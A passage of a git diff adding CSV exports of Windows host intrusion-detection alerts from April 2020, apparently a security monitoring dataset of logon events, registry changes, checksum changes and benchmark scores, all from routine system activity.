12:20:36.866",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:20:35.696",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:20:35.663",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:20:29.882",3,"Windows User Logoff", +"Apr 4, 2020 @ 12:20:29.835",3,"IIS NetworkCleartext Logon Success", +"Apr 4, 2020 @ 12:20:25.991",3,"Windows User Logoff", +"Apr 4, 2020 @ 12:20:25.961",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:20:25.897",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:18:15.967",3,"Windows Logon Success", diff --git a/data/MW_1_HIDS_2.csv b/data/MW_1_HIDS_2.csv new file mode 100644 index 0000000..cbd182f --- /dev/null +++ b/data/MW_1_HIDS_2.csv @@ -0,0 +1,2041 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 24, 2020 @ 11:07:08.840",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:07:05.652476900Z"",""eventRecordID"":""1560"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:07:05.651\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath\r\nDetails: \""C:\\Program Files (x86)\\Google\\Chrome\\Application\\81.0.4044.122\\elevation_service.exe\""\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:07:05.651"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\ImagePath"",""details"":""\\\""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\81.0.4044.122\\\\elevation_service.exe\\\""""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:07:05.651 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath +Details: ""C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.122\elevation_service.exe""""" +"Apr 24, 2020 @ 11:07:08.823",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:07:05.651378400Z"",""eventRecordID"":""1559"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:07:05.636\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:07:05.636"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:07:05.636 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:06:39.150",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '3f386f86526122f9896850ebf052d0e5' +New md5sum is : '4ca3775364adef8c8a16cf0912829686' +Old sha1sum was: '893e8a5eed791b28b06ba9456666d04f449facaf' +New sha1sum is : '07df8ca66d9d24734ea5b6b5956d0f113a793ce5' +", +"Apr 24, 2020 @ 11:06:18.188",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T11:01:16Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 11:06:08.332",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:05:08.190",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 24, 2020 @ 11:05:05.784",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T11:01:03Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 11:05:03.315",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 24, 2020 @ 11:04:52.908",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 11:04:08.454",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '47f9a8fc035cc80b23dfd8be4d23cda6' +New md5sum is : 'f4dbc0a0d5da7918ee74f20700fe9e9b' +Old sha1sum was: '592c18db00c7cbd34e9537e069e1bf1ae084bc9d' +New sha1sum is : '0065a10df965ceb8831b3eaf1af7c2eb6963f5de' +", +"Apr 24, 2020 @ 11:04:08.423",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '480a7b1436febced63b663e198db057e' +New md5sum is : '69718c4c9cb918d97834f2e3eebad7ce' +Old sha1sum was: 'a366c53c7d877bd13ac0386830dbad1b52127af9' +New sha1sum is : 'bc449125554f1a36c132e525051e343b065c06c7' +", +"Apr 24, 2020 @ 11:04:04.832",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_376ac' was added. +", +"Apr 24, 2020 @ 11:04:04.829",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:04:03.274",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:04:02.751",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:04:02.364",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:03:54.954",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : 'eda90e962d11223dcc2aa38c612f8db1' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '46828a156d8a5d6357730cd8697fe3b679bb75fd' +", +"Apr 24, 2020 @ 11:03:54.915",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '1c76fe95384571894fea60032499598b' +New md5sum is : 'ceeb06e70fb6f505171a7c9c711db2d5' +Old sha1sum was: 'd5716310782cfc86d0c74a24cb1f7f269a683771' +New sha1sum is : 'd8c1095e9ac02d487773bedbec465442b6695166' +", +"Apr 24, 2020 @ 11:03:54.903",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'ccf3312e10ed522b86fedf9f55f0ee11' +New md5sum is : '9ed8ee01a5e90b55c9e3ecfac1fe847c' +Old sha1sum was: 'aecc4f74462e7feab3e10f942d257edbd5ee7e0d' +New sha1sum is : 'e3d4fb00002e47cbb4fab5843100d604fcc5eeeb' +", +"Apr 24, 2020 @ 11:03:54.106",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '7b25497674cc671619a3e52c5a6b72e8' +New md5sum is : 'fe9f3d2ef09eed665f3e018cbf6645fc' +Old sha1sum was: 'c42697f1b7d2dcbd8290e433e4dc2ca12090701a' +New sha1sum is : 'ce373758828d2eb499f0ef2c64895e0a81a9c7dd' +", +"Apr 24, 2020 @ 11:03:52.579",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '07bcbe44689b969b45098e345d432277' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : '77f62fa77317c4bdd2c675ee6c90a7c8ca01c355' +", +"Apr 24, 2020 @ 11:03:52.330",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '73ff3da5b491b534e4f1fca73d797712' +New md5sum is : '07dc19bc9fdca741ff145af99cb6b962' +Old sha1sum was: '4f491ce1ca6fff4e44240d89175bfd01ac0bfaf4' +New sha1sum is : '21672b171b2f936929d2115820c42e4dd9cd8476' +", +"Apr 24, 2020 @ 11:03:52.079",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:03:52.064",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:03:51.454",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'd73c739d94aff99e2de6c480608f2631' +New md5sum is : '71dd38be548797ce53eaa8938ef75c1c' +Old sha1sum was: 'e68a929ae8dc2dda3351cb8777f4c6a4351c08c7' +New sha1sum is : '1ab1e055e97afe081bb9c3fe8d4828d7e7416aa2' +", +"Apr 24, 2020 @ 11:03:51.282",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '057b39f9a279a74ae6e39c10634a6eab' +New md5sum is : 'a030b1f0f699d16cbbdcb02462651a33' +Old sha1sum was: 'd9be4838d8b27777b7d1f01677d6ae2e41541245' +New sha1sum is : 'cd33fcd2825e0d7155b5e008ea746fde2e9f44e1' +", +"Apr 24, 2020 @ 11:03:50.846",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:03:50.829",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:03:50.642",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '07bcbe44689b969b45098e345d432277' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : '77f62fa77317c4bdd2c675ee6c90a7c8ca01c355' +", +"Apr 24, 2020 @ 11:03:49.525",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: 'f5ea91602eb594fc2b4973f59a513fcb' +New md5sum is : '06f5c6f330af834dd08ce904d9ae7cc8' +Old sha1sum was: '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +New sha1sum is : '0cf4c4c19a1201e41b9deba273320298f4f97b50' +", +"Apr 24, 2020 @ 11:03:48.032",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'ae5aeacd0ec096e337ca3ae6a707a5ef' +New md5sum is : 'dced103e4335a3cbc9f877909d35f249' +Old sha1sum was: 'cc73062438c2d276ae920c586c61e8046d7af96f' +New sha1sum is : 'e32425c2e3c2ae62b9591c6c3a4c676774ff1b10' +", +"Apr 24, 2020 @ 11:03:44.002",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +", +"Apr 24, 2020 @ 11:03:41.517",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +", +"Apr 24, 2020 @ 11:03:41.501",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '06f3d2f39343f57d32dd262e225aae84' +New md5sum is : 'd986956d161956f4b141437fa08b93c0' +Old sha1sum was: 'cc04983290ed793a09187d5412932856395b581c' +New sha1sum is : '5233ab213dffc9768aad8b2621a3d7286c52d461' +", +"Apr 24, 2020 @ 11:03:34.611",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +", +"Apr 24, 2020 @ 11:03:34.443",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T11:00:32Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 11:03:32.547",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:03:32.531",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:03:31.989",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:03:31.963",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:03:29.781",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:03:29.766",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:03:29.236",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '774e15e7baf44381d722db864ab890d7' +New md5sum is : '50e564d651df4ed3711c530cb99d635a' +Old sha1sum was: '469daffaef7546bd68eba730d238e5592de9f468' +New sha1sum is : '9f85b67a6c52e8312f838e2577ad0927a069eeda' +", +"Apr 24, 2020 @ 11:03:27.313",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '3237690c2487672daf0d764886f2486e' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '7b1cc9112a2248a97fd7bebf1719ff23d879c73f' +", +"Apr 24, 2020 @ 11:03:25.532",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '71d14a2d2a756124273e36b0738f8bba' +New md5sum is : '485b8cd95010a402c5cb5df739888197' +Old sha1sum was: 'c605e5d23f62dcaf8235115a11a8363912e96ea2' +New sha1sum is : '63bbc4fda93f12ece6293c204dfcb711133f2b09' +", +"Apr 24, 2020 @ 11:03:24.521",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'b4bce65b22aa4a519547960a719662c4' +New md5sum is : 'e7f150c5b2e694552ac7e3a81dfeb879' +Old sha1sum was: '3dac9d974e4d5d554b03c5e46ca8acc22b4826b6' +New sha1sum is : '3d5032ce5742ff04fd54fe3d6f8b54661fa11592' +", +"Apr 24, 2020 @ 11:03:24.406",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_376ac' was added. +", +"Apr 24, 2020 @ 11:03:24.391",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_376ac\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 11:03:24.375",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:03:19.877",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'df3256a25e140f891367ef4f45e45db2' +New md5sum is : '4e809c5a694024fb7e8bf55fa6c9d969' +Old sha1sum was: 'e2d4eee52f1f6550a2d64d496dfa6aa49e9a8351' +New sha1sum is : '55bbefa8f8f38af4f7308965422d124b00ec27d0' +", +"Apr 24, 2020 @ 11:03:18.562",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '50ce2913739b9a0576dc7cc15a20dd59' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '64b431120ed76993c1ebfe47b1082e06b2b95e0e' +", +"Apr 24, 2020 @ 11:03:14.329",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '1f47b7195d8fed9969326bd01db47d06' +New md5sum is : '5ee04d11a7749eecbe4961fcea115bfe' +Old sha1sum was: 'ee63ae916c97b341f744e3bde4a840cc48ac014b' +New sha1sum is : '5a2a3c359b19360c172a2e0681a155502359134d' +", +"Apr 24, 2020 @ 11:03:13.594",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '50ce2913739b9a0576dc7cc15a20dd59' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '64b431120ed76993c1ebfe47b1082e06b2b95e0e' +", +"Apr 24, 2020 @ 11:03:12.547",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +", +"Apr 24, 2020 @ 11:03:04.891",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '8ef26438ac25bee10003522daa8b4a2f' +New md5sum is : 'b46732281ca86fbba34d92112530013f' +Old sha1sum was: 'b211ed5eee8285bb054c42335a4a0a9b2c9385b0' +New sha1sum is : 'f947da256090bd0fdc7e9fb2e5d566087624dd28' +", +"Apr 24, 2020 @ 11:03:04.782",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:02:58.407",7,"Integrity checksum changed.","File 